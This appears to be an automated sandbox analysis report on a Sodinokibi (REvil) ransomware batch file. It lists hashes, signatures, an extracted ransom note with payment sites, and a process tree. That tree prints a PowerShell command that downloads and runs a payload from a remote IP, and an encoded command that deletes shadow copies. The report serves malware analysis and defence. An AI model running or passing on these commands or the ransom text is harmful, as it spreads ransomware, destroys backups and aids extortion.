Overview

overview

10

Static

static

c509aa5a7d...45.bat

windows7_x64

10

c509aa5a7d...45.bat

windows10_x64

10

Analysis

  • max time kernel
    39s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    15-05-2020 19:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c509aa5a7dfc8054aa7b969c9b18e245.bat

  • Size

    221B

  • MD5

    2f633c8f1954a6a34a856ca408955cc0

  • SHA1

    fcad0d04ed8366491a60c78bb0210502e2755f91

  • SHA256

    a1eabb8f6bb968611704695eecb919d4b989b4882ddc982fea9d14b1a2d43486

  • SHA512

    1f5b2b75571fbbd329bf0c89c8d1789424aaddd8b942fdf7579a36fde344b881093022de34570cb3938b038e394ff2c42854cd6f20d493a896105f22b30f009c

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245

Extracted

Path

C:\p7wl3-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension p7wl3. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/E87379AD627A29CF Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: GgEcvXP2S1RAYTVxxZxIgpb+UMk7W2k+qobLzYZEonqfT0703/PQCxUGO3RwWEfS ZqeDXHEU3dqVlV9j/ZUyz/DwaHUvglQg8H4yIyrS4u1CO/EbZMp/+qIGpSRdZRG4 DLQ/mgJJdgj2cy+IcUcncSN/sH1LPpyDhUdI4h8zh5F20LYrSRoTesfJUFD1XJaL GLR5ncu2r/bXhphezziu67YtkSu0LrGciCND320GHupwReSmlPiP1YCGdaRp53Yi qiTdXtAcZjMH4f88HX5TA+tqY9lYZc1D5DCZ1uheQsb2Tqo3DD+bRhH9aR+TAi7A JHOOiQdsfDSuUWcB7zWnNLvuEzv8MVqZyl9IBsV3XHOCgQSyn0b/FhiibDzmwupd 0JZvAqYzU7stTfty98+19PFDUX8lB9PlYmkUN7phua21Yvys6X6tWNkI1hSxqjhR hcYdcfZn3z57AEHmIr50GBi5QFLK+9lSu5IXyNq6l4AmYNmbMs/w+FimM2unmUPj CyIPgVF4CMtpP6FOWKsKHOCTxaGTkG8pwolbJNccRVe7TMRs5itx9O4FwHoKlAdk gYvpycqBBHXVV33vriikX2h0w48cfoT5iZtP1sExfXAEf2Ft5kkPxIK4cSQ4HYaM QMQ9iKwtPv1b5w5wI5JH64Uw3h+XOSMX8tevs5oz+nZsOb6rVCM5nn08oNq7vaZg AG0Kvu+wxDM85OT35rCjMlAz0GR7u/hM0zCyBfoiN3wXxige9+6kdwekFbzq96f3 NgTFWf2W/Q0M0A3K4+Kxf7Q2RccTPqGi0zhYTp+CjCvFbPAk3mxzKHbhmHuY/765 7yQZVtFa9SHEtVBWMaF+f5JR1Bn8jVLPQ97lNT/GGHele8+A3/6p6CvHKa53nMz0 2duV31aIrjcPJWZywIbE6ZVJyMu+HOmW+hGd9qpZd5bxoDSbmysmEiO8HJCZxN3n FAogxdTLGqkMj8JWigRvaR4fqU4P+nMHyH4HuqB7N8StZQW6o4jCUhRnwWKhIycU My8/HzhfwHJoUNCWVGgbOmEGquw3/UX94cRvvgutZeHLZfbaxxS04Og9JbC94ZbQ 6uZAeQOrSyGNe8jp/BeOiI9GZMelvjpQdzc14ihHc1Tmxm/TmqscSAjNh0OGaLAg XXfiEeL4U8D/MwV34Tprn949RGD9EeIv/djo/ce3xIt27wnAx+3f4KCF5MSo678b hJug8zDpnJi0RCtprO4GVv+ucC+01qXAgiHYpn8XD2NXaqOb+ZNKKHMdPupc9ImG HxJBEpekjTNbHjYxmD75HMLkmYWUjXG2fQAW5dGh ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E87379AD627A29CF

http://decryptor.cc/E87379AD627A29CF

Signatures

  • Drops file in Program Files directory 19 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 77 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\c509aa5a7dfc8054aa7b969c9b18e245.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/c509aa5a7dfc8054aa7b969c9b18e245');Invoke-ACEEGDUJNDIFWO;Start-Sleep -s 10000"
      2⤵
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      PID:304
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1036
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1844

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit